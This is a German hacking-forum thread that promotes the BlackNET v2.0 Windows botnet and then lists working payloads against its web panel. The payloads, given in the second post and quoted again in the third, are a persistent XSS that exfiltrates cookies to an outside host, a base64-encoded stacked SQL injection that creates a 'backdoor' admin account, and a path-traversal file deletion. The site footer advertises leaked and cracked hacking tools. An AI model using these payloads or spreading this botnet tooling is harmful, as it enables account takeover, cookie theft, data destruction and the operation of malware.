Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

BlackNET v2.0 | Free advanced and modern Windows botnet

- - - - -

  • Bitte melde dich an um zu Antworten
2 Antworten in diesem Thema

#1
Ch!ller

Ch!ller

    Shinigami

  • Premium Member
  • Likes
    910
  • 937 Beiträge
  • 1318 Bedankt
  • Spender
  • verifiziert

Beschreibung, Anleitung zum Builden, aufsetzen entnehmt ihr bitte dem github

Please Login HERE or Register HERE to see this link!


  • DR.zydz und RazeVX gefällt das

Alle Angaben und Informationen dienen lediglich der Theorie!


#2
IRET

IRET

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    71
  • 34 Beiträge
  • 7 Bedankt

Ist das von dir?

 

 

Persistent XSS:

fetch("connection.php?data="+btoa("vcid<img src=x onerror=fetch('https://bla.com/x.php?c='+encodeURI(document.cookie)) />|BN|cpname|BN|os|BN|av|BN|stats|BN|usb|BN|admin"))

Stacked SQLI:

/receive.php?vicID=Jyk7SU5TRVJUIElOVE8gYGFkbWluYCAoYHVzZXJuYW1lYCwgYHBhc3N3b3JkYCwgYGVtYWlsYCwgYHJvbGVgLCBgczJmYWAsIGBzZWNyZXRgLCBgc3FlbmFibGVgLCBgcXVlc3Rpb25gLCBgYW5zd2VyYCkgVkFMVUVTCignYmFja2Rvb3InLCAnNjNjZDE2NzI2ZjFiNTZlZjEyMGQ1YzFkZGZmYWVkM2UzZDQ3MmFmNmRhYmM1OTE0YTkzYjU1Y2YzMGNhMjg0ZCcsICdsb2NhbGhvc3RAZ21haWwuY29tJywgJ2FkbWluaXN0cmF0b3InLCAnb2ZmJywgJ251bGwnLCAnb2ZmJywgJ1NlbGVjdCBhIFNlY3VyaXR5IFF1ZXN0aW9uJywgJycpOy8qCg==&command=Q2xlYW5Db21tYW5kcw==

backdoor:admin

 

 

Path Manipulation für unlink/delete:

fetch('/receive.php?vicID=&command='+btoa('DeleteScript|BN|../index.php'))

  • Ch!ller, Payload und someonenoone gefällt das

#3
Ch!ller

Ch!ller

    Shinigami

  • Premium Member
  • Likes
    910
  • 937 Beiträge
  • 1318 Bedankt
  • Spender
  • verifiziert

 

Ist das von dir?

 

 

Persistent XSS:

fetch("connection.php?data="+btoa("vcid<img src=x onerror=fetch('https://bla.com/x.php?c='+encodeURI(document.cookie)) />|BN|cpname|BN|os|BN|av|BN|stats|BN|usb|BN|admin"))

Stacked SQLI:

/receive.php?vicID=Jyk7SU5TRVJUIElOVE8gYGFkbWluYCAoYHVzZXJuYW1lYCwgYHBhc3N3b3JkYCwgYGVtYWlsYCwgYHJvbGVgLCBgczJmYWAsIGBzZWNyZXRgLCBgc3FlbmFibGVgLCBgcXVlc3Rpb25gLCBgYW5zd2VyYCkgVkFMVUVTCignYmFja2Rvb3InLCAnNjNjZDE2NzI2ZjFiNTZlZjEyMGQ1YzFkZGZmYWVkM2UzZDQ3MmFmNmRhYmM1OTE0YTkzYjU1Y2YzMGNhMjg0ZCcsICdsb2NhbGhvc3RAZ21haWwuY29tJywgJ2FkbWluaXN0cmF0b3InLCAnb2ZmJywgJ251bGwnLCAnb2ZmJywgJ1NlbGVjdCBhIFNlY3VyaXR5IFF1ZXN0aW9uJywgJycpOy8qCg==&command=Q2xlYW5Db21tYW5kcw==

backdoor:admin

 

 

Path Manipulation für unlink/delete:

fetch('/receive.php?vicID=&command='+btoa('DeleteScript|BN|../index.php'))

Nope, ist nicht von mir, habs nur geposted, finde es aber Super das du direkt nen audit davon gemacht hast, kannst ja dem Coder via Github mitteilen, oder auch nicht, super arbeit von dir


  • IRET und Payload gefällt das

Alle Angaben und Informationen dienen lediglich der Theorie!




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen: 4

Mitglieder: 0, Gäste: 4, unsichtbare Mitglieder: 0

Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.